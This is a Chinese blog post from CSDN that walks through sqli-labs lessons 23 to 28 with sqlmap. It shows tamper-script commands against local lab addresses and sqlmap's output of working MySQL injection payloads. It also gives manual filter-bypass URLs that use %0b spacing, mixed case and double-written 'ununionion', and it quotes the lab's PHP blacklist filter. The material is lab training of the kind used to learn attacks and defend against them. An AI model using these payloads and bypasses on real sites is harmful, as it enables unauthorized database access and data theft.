sqlmap刷sqllibs_04-过滤绕过-23-28

最新推荐文章于 2024-07-03 19:40:24 发布
最新推荐文章于 2024-07-03 19:40:24 发布
阅读量1.7k 收藏 3
点赞数 1
分类专栏: # Sqllibs_master # sqlmap试炼场
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43901038/article/details/107654343
版权

本篇文章中的一些过滤讲解大部分来自于我的另外一篇博客,如果不太清楚,可以移步:
Sqllibs-Less23-28

每一关我都尽量试了一下,有些可以有些不太行,关于不太行的,我后续进阶玩法的时候再慢慢补上,如果您看到的时候我还没有补上,可能是我忘记了,可以私信催我一下啦!

23、less23-Error Based-no comments

在这里插入图片描述
如上,可得本关过滤了注释符 #- -

在本关中类似于第一关,但是对于id进行了注释符的过滤,因此我们需要利用参数 - - tamper = versionedkeywords.py 进行绕过。

脚本:versionedkeywords.py
注释绕过

以下为sqlmap的注入语句:

C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-23/index.php?id=1" --tamper=versionedkeywords.py

以下为sqlmap给出的payload:

sqlmap identified the following injection point(s) with a total of 261 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 7930=7930 AND 'RTnv'='RTnv

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71716a7171,(SELECT (ELT(5071=5071,1))),0x7176786a71,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'rldO'='rldO

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 8909 FROM (SELECT(SLEEP(5)))NQXU) AND 'zgve'='zgve
---

24、less24-Second Degree Injections

25-less25-Trick with OR & AND

在这里插入图片描述
由上我们可以发现本关过滤了or和and字符串,因此我们需要利用参数 - - tamper = versionedkeywords.py 进行绕过。

以下为sqlmap的注入语句:

C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-25/?id=1" --level=5

以下为sqlmap给出的payload:

sqlmap identified the following injection point(s) with a total of 358 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: HAVING boolean-based blind - WHERE, GROUP BY clause
    Payload: id=1' HAVING 7117=7117-- iadr

    Type: error-based
    Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)
    Payload: id=1' PROCEDURE ANALYSE(EXTRACTVALUE(5329,CONCAT(0x5c,0x71766a7071,(SELECT (CASE WHEN (5329=5329) THEN 1 ELSE 0 END)),0x71706b7171)),1)-- IrQH

    Type: time-based blind
    Title: MySQL >= 5.0.12 RLIKE time-based blind
    Payload: id=1' RLIKE SLEEP(5)-- bBiX

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-4759' UNION ALL SELECT NULL,CONCAT(0x71766a7071,0x6e4d6c6f6c576d664b4741544956706e4c42686e584e74784b6154617173475765556246724b7074,0x71706b7171),NULL-- -
---

25a、less25a-Trick with OR & AND Blind

本关第25关是类似的,闭合方式为数字型,没有单引号,而且没有输出数据库信息,因此我们不能使用报错注入,但还可以使用union注入和延时注入。

以下为sqlmap的注入语句:

C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-25a/?id=1" --level 5 --dbs

以下为sqlmap给出的payload:

sqlmap identified the following injection point(s) with a total of 323 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1 RLIKE (SELECT (CASE WHEN (3429=3429) THEN 1 ELSE 0x28 END))

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-3034 UNION ALL SELECT NULL,NULL,CONCAT(0x717a706271,0x5a76687552436449644f4751734561586b48645a67546e66516d554b6c4252635a4c66664b796b62,0x71766b6b71)-- -
---

26、less26-Trick With Comments

在这里插入图片描述
在本关中我们过滤的有and、or、/*、#、空格以及\,闭合方式为单引号闭合。

在本关我们可以利用union注入,过滤了空格,我们需要使用其他的字符替换空格。在这里我们利用%b0,替换空格,其他的类似。

http://192.168.10.208:8081/sqli-labs-master/Less-26/?id=0‘ %0b union %0b select %0b 1,2,3 ||'1'='1

以下为sqlmap的注入语句:

以下为sqlmap给出的payload:

26a、less26a-Trick With Comments

看源码可以发现这个代码类似于less26关,但是闭合方式改变为单引号+括号,数据库中的错误信息不进行输出。无法进行报错注入,可以利用延时注入和union注入,因此类似于less26关。

以下为sqlmap的注入语句:

以下为sqlmap给出的payload:

27、less27-Trick with SELECT&UNION

我们的过滤函数,可以发现,相较于26关,这一关过滤的条件增加了很多。过滤的有 :and、or、/*、#、空格、\、出现任意多次的select、一次union、UNION、SELECT、Union、Select。并且可以发现会显示数据库产生报错信息呢,因此可以利用报错注入和union注入。

当我们使用union注入时,可以利用ununionion、SeLecT绕过上面的注入函数。手工其余的类似于上面。
手工注入语句如下:

http://192.168.10.208:8081/sqli-labs-master/Less-27/?id=0'%0bununionion%0bSeLecT%0b1,database(),'@@basedir

易知我们需要进行双写绕过,额,我在我的tamper里面找了一下,并没有发现双写绕过的tamper,所以这个我之后再来补上吧!

以下为sqlmap的注入语句:

以下为sqlmap给出的payload:

27a、less27a-Trick with SELECT&UNION

以下为sqlmap的注入语句:

以下为sqlmap给出的payload:

28、less28-Trick with SELECT&UNION

function blacklist($id)
{
	$id= preg_replace('/[\/\*]/',"", $id);				//strip out /*
	$id= preg_replace('/[--]/',"", $id);				//Strip out --.
	$id= preg_replace('/[#]/',"", $id);					//Strip out #.
	$id= preg_replace('/[ +]/',"", $id);	    		//Strip out spaces.
	//$id= preg_replace('/select/m',"", $id);	   		//Strip out spaces.
	$id= preg_replace('/[ +]/',"", $id);	    		//Strip out spaces.
	$id= preg_replace('/union\s+select/i',"", $id);	    //Strip out UNION & SELECT.
	return $id;
}

由上面源码可以得出,本关过滤的了/*、–、#、空格、union select字符串。

本关我试着抛了一下发现还是没有跑出来,希望有办法的大佬可以留言评论啦!

这里我放一下手工注入的语句:

http://192.168.10.208:8081/sqli-labs-master/Less-28/?id=0')%0bUnIoN%0bSeLecT%0b1,database(),('@@basedir
或者(PS:下面不能是&&,一定得是||)
http://192.168.10.208:8081/sqli-labs-master/Less-28/?id=0')%0bUnIoN%0bSeLecT%0b1,database(),@basedir |('1')=('1

28a、less28a-Trick with SELECT&UNION

第28关的盲注形式。
在这里插入图片描述
本关类似于less28,只是少了许多个过滤函数而已,且闭合方式为单引号+括号

以下为sqlmap的注入语句:
本关我们无法利用union注入,因此我们在技术上排除了union。因此利用参数 --technique=BEST

C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-28a/?id=1" --level=5 --risk=3 --technique=BEST

以下为sqlmap给出的payload:

sqlmap identified the following injection point(s) with a total of 108 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1') AND 4102=4102-- wgBC

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1') AND (SELECT 4887 FROM (SELECT(SLEEP(5)))RnLD)-- NYSM
---
xor0ne_10_01
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
python的编码模块char_关于sqlmap当中tamper脚本编码绕过原理的一些总结(学习python没多久有些地方肯定理解有些小问题)...
weixin_35792236的博客
02-21 236
sqlmap中tamper脚本分析编写置十对一些编码实现的脚本,很多sqlmap里面需要引用的无法实现,所以有一部分例如keywords就只写写了几个引用了一下,其实这里很多脚本运用是可以绕过安全狗的。本人也是刚开始学习python没多久,有一些错误的话请指正chardoubleencode.py:对给定的payload全部字符使用双重url编码:import stringimport syspa...
sql注入扫描_sqlmap-1.1.3.zip
02-13
在版本sqlmap-1.1.3中,该工具已经兼容Python3,这扩大了它的使用范围,因为Python3逐渐成为主流的编程语言。 SQLMap的工作原理主要包括以下几个步骤: 1. **探测阶段**:SQLMap首先会尝试各种可能的注入点,通过...
versionedmorekeywords.py
山兔的博客
04-13 83
sqlmap绕过脚本versionedmorekeywords.py只针对mysql大于等于5.1.13。
sqli-labs进阶篇 25_28
Lucky小小吴的小屋
01-30 927
一、如何判断单/双引号注入? ?id=1' 报错了,一定是单引号注入 -- 解析下 ①如果是双引号注入:"XXX" 输入:?id=1" or 1=1 执行:"1" or 1=1 " 结果:报错 ②如果是单引号注入:'XXX' 输入:?id=1" or 1=1 执行:'?id=1" or 1=1' 结果:id=1,执行成功 二、如何判断闭合注入? 以单引号为例 三、怎么绕过一些字符? 一般是使用3种方法进行绕过,分别是URL编码、大小写、重写 (1)URL编码的常见字符 %09
sqli-labs第23
最新发布
rp114514的博客
07-03 156
在本关中,我们学习了如何判断是否存在SQL注入,如何利用错误信息推断数据库名称、表名和字段名。这些技巧不仅提高了我们的SQL注入攻击能力,也增强了我们对数据库安全的理解。今天的实训课我们挑战了sqli-labs第23关,这是一个错误型盲注的挑战,主要的目标是通过利用错误信息来推断出数据库中的数据,而不是直接显示在页面上。错误判断出以后,然后利用判断库名,列名,数据的方法进一步探索数据库中的其他表和字段,以及可能的敏感数据。我们可以看到,--%20没有生效,在后面加上#,依旧抛出错误。判断是否存在注入:?
sql注入_1-7_绕过注入
weixin_44110913的博客
12-09 668
文章目录一.sql注入绕过概念二.sql注入绕过手段三.sql绕过演示四.总结 一.sql注入绕过概念 1.为什么要绕过? 因为有时候存在注入,但是很多符号被过滤掉, 所以我们不的不使用绕过手段。 2.绕过就是虽然我们注入时使用的字符串或者符号被过滤,但我们依然可以使他报错,并且报出他的数据库表名等 二.sql注入绕过手段 1.注释符 通常是用来注释掉id=1’ 这个单引号,或者字符串 2....
【无标题】
weixin_51387754的博客
10-17 1119
CISP-PTE专注于培养、考核高级实用型网络安全渗透测试安全人才,是业界首个理论与实践相结合的网络安全专项技能水平注册考试。
sqlmap-1.6.5-11_sqlmap-1.6.5-11
09-20
根据提供的文件名`sqlmapproject-sqlmap-99f07b6`,这可能是一个包含源代码或特定构建的版本。 2. 目标检测:使用`sqlmap -u URL`命令检测目标URL是否存在SQL注入漏洞。 3. 漏洞确认:通过`sqlmap --dbs`列出所有可...
ibatis-sqlmap-2.3.4.741-sources.zip_4 3 2 1_ibatis-sqlm_ibatis-s
09-23
标题 "ibatis-sqlmap-2.3.4.741-sources.zip_4 3 2 1_ibatis-sqlm_ibatis-s" 暗示了这是一个关于iBATIS SQLMap的源码包,版本号为2.3.4.741,可能是一个增强或修改后的版本,具有特定的优化和改进。描述中提到了针对...
sqlmap_自动化sql注入引擎_None_sqlmap_sql注入_sql_flath1c_vulnerability_
10-02
SQL注入(SQLi)是一种注入攻击,...攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或Web应用程序的身份验证和授权,并检索整个SQL数据库的内容;还可以使用SQL注入来添加,修改和删除数据库中的记录。
spring_mybatis_spring-mybatis_
10-02
- **sqlmap-config.xml**:MyBatis的映射配置文件,用于定义Mapper接口与XML文件的关联。 - **spring-context.xml**:Spring的配置文件,用于定义Bean,包括SqlSessionFactoryBean、MapperScannerConfigurer(扫描...
工具使用|神器Sqlmap tamper的使用介绍
weixin_42282189的博客
11-21 3390
作者: 村里的小四 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 前言 从开源软件Sqlmap学习字符的篡改,现在的web网络环境参数出入处基本都会过滤某些字符串,我们在进行sql注入时,Sqlmap这款Sql注入神器的插件就可以帮助我们(Tamper)篡改字符,实现绕过,以下为实战中常用的Tamper,建议收藏。 Sqlmap下载地址:https://github.com/sqlmapproject/sqlmap 0x02 常用Tamper 用法这里就不过多介绍了.
渗透测试技术----工具使用(四)--SQLMap使用方法
wwl012345的博客
08-29 2488
一、SQLMap介绍 1.SQLMap简介 SQLMap是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞,内置了很多绕过插件,是一款自动进行SQL注入的非常好用的工具。 2.SQLMap支持的数据库 MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、F...
sql-labs闯关26~31
qq_44663230的博客
09-03 2416
sql-labs闯关26-28a 29~31暂时不做
SQLMAP脚本-sql-labs-Less-28-29
m0_69844818的博客
01-03 417
HTTP参数污染(HTTP Parameter Pollution) 攻击者通过在HTTP请求中插入特定的参数来发起攻击,如果Web应用中存在这样的漏洞,可以被攻击者利用来进行客户端或者服务器端的攻击。这个labs是一个HTTP参数污染所以也简单写就需要&连接一些就行了,想了解这东西的去搜索吧,这里教的是怎么写脚本提供思路。使用双写union绕过,编写cx.py脚本。忒忒后端代码,比28简单更多。一样的使用28的脚本即可拿下。
Less-25(绕过or或and--盲注)
老司机开代码的博客
08-04 462
文章目录1. 题目分析2. 注入思路2.1 盲注2.2 联合注入3. SQLmap注入 1. 题目分析 根据less24的经验以及通过?id=1 aandnd 1=2 --+和?id=1 aandnd 1=1 --+可以判断出id的类型为int;并且可以使用盲注或联合查询两种方法解决的题目。 一下主要回顾盲注的解题思路: False页面: True页面: 之前学习过盲注,我们知道盲注主要分为布尔盲注和时间盲注,同时再回忆一下要使用的函数: length() :判断字长 substr(): 从字符串中取
sqlmap自带的tamper你了解多少?
hl1293348082的专栏
04-04 4545
sqlmap 是一款注入神器广为人知,里面的 tamper 常常用来绕过 WAF ,很实用的模块,但是却常常被新手忽略(比如我),今天就整理总结一下 tamper 的用法以及 tamper 的编写 PS:工具既然叫做工具,就是用来辅助上单的,呸辅助我们完成某些任务的,仅仅适用于当进行某些重复的繁琐工作或是偶尔懒癌发作时,不能过度依赖 ALL 表示所有数据库都适用,具体指出哪种数据库就表名只只适用于某些数据。 使用方法: sqlmap.py XXXXX -tamper "模块名" 各个 tamp
sqli-labs通关全解---有关过滤绕过--less23,25~28,32~37--8
cyynid的博客
01-12 908
preg_replace()用于sql注入防护中,主要是将一些疑似攻击的代码进行替换处理,从而使得他无法达到攻击的目的,例如将‘/’替换成空格,将union替换成空格等,但是由于攻击方式的多样化和程序员的疏忽,往往无法过滤掉所有的攻击,甚至可以对此类过滤进行绕过处理。返回在预定义字符之前添加反斜杠的字符串。即将预定义的字符进行转义提示:该函数可用于为存储在数据库中的字符串以及数据库查询语句准备字符串。本文列举了一些对此类过滤方法的绕过手段,同样,也可以针对绕过手段,进行更加安全的过滤
sqlmap常用tamper汇总及使用指导
Thunderclap的博客
02-15 1778
sqlmap常用tamper汇总及使用指导
SQLMap 的 --sql-shell 和 --os-shell 的区别
05-20
SQLMap是一款自动化的SQL注入工具,可以通过一些选项来执行不同的操作。其中,--sql-shell和--os-shell是两个不同的选项,它们的区别如下: 1. --sql-shell:这个选项会在目标数据库中打开一个交互式的SQL shell,...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值